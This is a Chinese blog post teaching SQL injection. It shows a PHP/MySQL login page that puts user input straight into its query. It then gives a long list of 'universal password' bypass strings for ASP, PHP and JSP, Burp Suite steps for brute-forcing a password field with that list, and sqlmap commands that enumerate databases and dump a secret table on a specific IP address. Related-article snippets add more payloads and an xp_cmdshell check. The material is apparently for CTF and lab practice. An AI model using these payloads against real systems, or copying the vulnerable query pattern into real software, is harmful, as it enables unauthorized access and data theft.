SQL注入

最新推荐文章于 2024-07-25 14:18:03 发布
最新推荐文章于 2024-07-25 14:18:03 发布
阅读量455 收藏
点赞数
分类专栏: Hack 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44442852/article/details/106727584
版权

PHP + mysql

index.html
<html>
    <body>
        <form    action="/login/login.php"  method="POST">
        
            <p>User: <input type="text" name="user"  / ></p>
            <p>Password: <input  type="text" name="passwd" /></p>
            <input type="submit"  value="Tijiao">
        </form>
        </form>
    </body>
</html>
login.php
<?php
// 从前端 html传过来的表单(form)中,提取method=POST的表单所有值,存到一个Array中,通过数组[ ]索引(html传入的<input name=>)获取对应值
$name =  $_POST['user'];
$passwd = $_POST['passwd'];
// 在本地后端数据库先创建basic (db),然后connect链接
$con = mysqli_connect("localhost:3306", "root","root","basic");
if(!$con){
    die("connect error  " );
}

echo "<p>name: $name";
echo "<p>passwd: $passwd";


$sql_check = "SELECT * FROM login_table WHERE user='{$name}' and passwd='{$passwd}'";
// query() 根据sql语言在数据库中询问查询
$check_result = mysqli_query($con, $sql_check);
if(!$check_result)
{
    printf("\n");
    printf("Error : %s\n", mysqli_error($con));
    exit();
}
if(mysqli_num_rows($check_result)>0)
{    
    // 如果查到结果 大于0,就返回name
    echo "welcome $name";
}
else {
    echo "<p>no user </p>";
    // 如果没有查到相关内容(result=0),就注册
    $sql_comment = "INSERT INTO login_table(user, passwd)VALUES('$name','$passwd')";
    mysqli_query($con, $sql_comment);
    echo "<p>Has logined $name</p>";
}
mysqli_close($con);
?>

SQL注入

No1: 后台登录万能密码

 admin' or 1=1 -- (最后加一个空格)(注释后面)

在这里插入图片描述
注意 注释位置一定要加空格!

在这里插入图片描述
在这里插入图片描述
其他后台万能密码
ASP 万能密码

1"or "a"="a

2')or('a'='a

3or 1=1--

4'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or'a'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13:'OR 1=1%00

14:"or 1=1%00

15:'xor

16:用户名 ’ UNION Select 1,1,1 FROM admin Where ‘’=’ (替换表名admin) 密码 1

17: admin’ or ‘a’='a 密码随便

PHP 万能密码

1:'or 1=1/*

2:User: something

Pass: ' or '1'='1

JSP 万能密码:

1:1'or'1'='1:

2:admin' or 1=1/*
————————————————
原文链接

可以放到一个文件中,然后用burpsuite进行破解
在这里插入图片描述
劫到该post报文,对passwd进行关键词爆破
在这里插入图片描述
file 中选刚才字典,然后attack
在这里插入图片描述
登录成功:
在这里插入图片描述

文章索引 id

在这里插入图片描述
在这里插入图片描述
报错,说明有交互,可能存在SQL注入漏洞。

sqlmap使用

0 超详细SQLMap使用攻略及技巧分享

1 通过请求报文分析

用burpsuite截获请求报文,保存到txt文件里,起名如:request.txt
在这里插入图片描述
执行命令:

sqlmap -r request.txt -p passwd(关键词)  --dbs

-r REQUESTFILE
              Load HTTP request from a file
              
-p TESTPARAMETER
              Testable parameter(s)
--dbs  Enumerate DBMS databases  //枚举数据库管理系统所有数据库

注入点分析

在这里插入图片描述

  1. 注入点关键字段为 --data
sqlmap -u "http://220.249.52.133:41185/"  --data "search=1" --dbs

--data  通过POST发送数据参数

结果返回两可用数据库
在这里插入图片描述

  1. 根据得到的数据库,查看指定数据库的tables
 sqlmap -u "http://220.249.52.133:41185/"  --data "search=1" -D news --tables   (注意:删掉--dbs)

-D DB  (指定数据库名)             DBMS database to enumerate
--tables   获取指定数据库下面的所有table

在这里插入图片描述
4. 暴力破解table内的项数据

sqlmap -u "http://220.249.52.133:41185/"  --data "search=1" -T secret_table --dump

-T TBL(指定表命令) DBMS database table(s) to enumerate

在这里插入图片描述

RWX-林
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sql 注入
瞎几把学
06-06 467
xp_cmdshell这个模块给删除了需要上传xplog70.dll这个文件一、xp_cmdshell的删除及恢复1、判断xp_cmdshell是否存在and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)select count(*) from master.dbo
sql注入万能密码 admin 'or '1'='1'# (# 为注释后面内容)
wjwqp的专栏
03-01 1万+
admin 'or '1'='1'# (# 为注释后面内容) admin'-- admin'or4=4-- admin'or'1'='1'-- admin888 "or"a"="a admin'or2=2# a'having1=1# a'having1=1-- admin'or'2'='2 ')or('a'='a or4=4-- c a'or'4=4-- "or...
【超详细版】SQL注入原理及思路绕过(看这篇就够了)
fly_enum的博客
12-30 2万+
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
SQL注入漏洞利用
最新发布
weixin_57514792的博客
07-25 1057
SQL注入漏洞利用
sql注入,万能密码解析
qq_52843411的博客
08-22 458
由引号,我们为了语法格式的正确,所以对1前加了一个引号,如同admin与cn后的引号一样,是为了和页面代码所对应,否则会报错,而我们真正的万能密码,后面加了#注释了后面所有的语句,我们1就不用为了与之后的引号对应,所以1前的引号就不用加了,否则加了会导致报错,而前一个1加不加都行。经过我们的运算,这个or语句为真,我们就通过这个万能的语句成功实现了未知用户和密码的登录。我们在这个万能用户名的后面加了个#,#是一个注释符,后面的语句就不会执行了。#两个万能密码1的引号没了,1本来带引号是因为。
表单绕过实验万能密码
aliu555的博客
03-14 581
那么我们在看这条语句,就相当于只需要满足use的值为空,或者是1=1和pwd等于’123‘。我们理解这条是查询数据库中表名为tb_admin中的use列,并且查询需要满足的条件是use列中值为“11”而且还要pwd列值为“123”的数据信息。万能密码的用户名和密码: admin or 1=1 或者1 or 1=1 or 1=1这个的原理就是利用了数据库在查询过程中的代码漏洞造成的。通常我们会使用这种方法来验证网页上用户输入的账号和密码,如果是有这条信息的则出现另一个登录成功。这是一个普通的查询语句。
SQL手工注入语句
admin的博客
10-27 472
万能密码 or'='or' admin' or '1'=1' admin'# 1' or 1=1 --+ 显错注入admin' '1'='1 思路:看有没有注入,判断多少列,判断数据库类型,找库,找表,找列,联合查询 #可以在输入框输入,不能在url输入,用%23代替 --+可以在url输入,但不能在输入框输入 判断数据库类型 and exists (select * from msysobjects)>0 access数据库 and exists
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种严重的安全威胁,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来执行未经授权的数据库操作。攻击者通常寻找没有适当验证和过滤的用户输入,然后利用这些漏洞来构造能改变原始SQL语句意图的...
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
buu web:[极客大挑战 2019]BabySQLsql注入双写绕过)
m0_55378150的博客
04-18 3043
打开靶场,熟悉的界面 依旧是先上万能密码 1' or 1=1# 1' or 1=1# 好家伙,直接就给你报错了,可以看到,or被它过滤掉了,所以我们尝试一下双写绕过 1' oorr 1=1# 1' oorr 1=1# 成功登录! 可以拿admin回去登录界面继续注入了,先爆字段 admin' oorrder by 2#(密码随便输) 提示在字段数附近有报错,猜测可能是by也被过滤了,依旧是双写绕过 admin' oorrder bbyy 2# 可以的,通过...
sql注入万能密码总结
坚持硬核
01-30 3680
select * from admin where username='' and password ='' 第一种: 当你已知管理员账号名为admin时可以直接尝试 admin' # select * from admin where username='admin' #'and password='' 一些事实: mysql在处理弱类型的时候,比如说非数字开头的字符串和数字相加,字符串会被认为是0 证明:非数字开头的字符串和0是相等的 数字开头的字符串: 也就说: selec
sqli-labs 11-16
weixin_45442394的博客
09-14 332
一、环境配置 二、访问192.168.182.167:8001 Less-11 输入admin’,出现语法错误,存在字符型注入 admin’ or ‘1’=’1,登录成功 admin’ order by 2#,页面回显,有两列 -admin’ union select 1,2 #,判断显示位 -admin’ union select 1,database() #,判断数据库名称 查数据库“security”的表: -admin’ union select 1,group_concat(ta
那些年我们所误解的万能密码
酉酉的博客
03-14 1202
前言 在sql注入中万能密码是最很典型,也是基础的存在,但新手很容易忽视它,以为真正懂了,但却没有。我就是这样,最近重新看它,发现我根本就没真正掌握,甚至网上很多关于万能密码的分析是错的 分析 sql语句中and的优先级比or的高 假设sql语句是这样 SELECT * FROM users WHERE username='$uname' and password=$passwd' 正常输入...
万能密码:‘or 1=1-- 实战SQL注入,秒破后台
热门推荐
杨明金的博客
10-24 3万+
主要是没有对登录密码的字符串进行参数化和过滤,所以导致网站可以直接用“万能密码”进行突破登录 仅供学习交流 这是某同学做的网站,今天无聊打开了,并帮他进行测试一下 看到这个后台,感觉做的还是不错的,首先SQL注入一般这种“万能密码”在99%的网站都是没有用的了,因为几乎所有发布到网络上的网站都是有进行安全考虑的,像这种学生的学术作品的话,一般不会考虑那么多,所以直接使用万能密码进行登录后台 万能密码:'or 1=1-- 用户名随便输入,密码填写这个,输入验证码,ok,大功告成 直接就.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值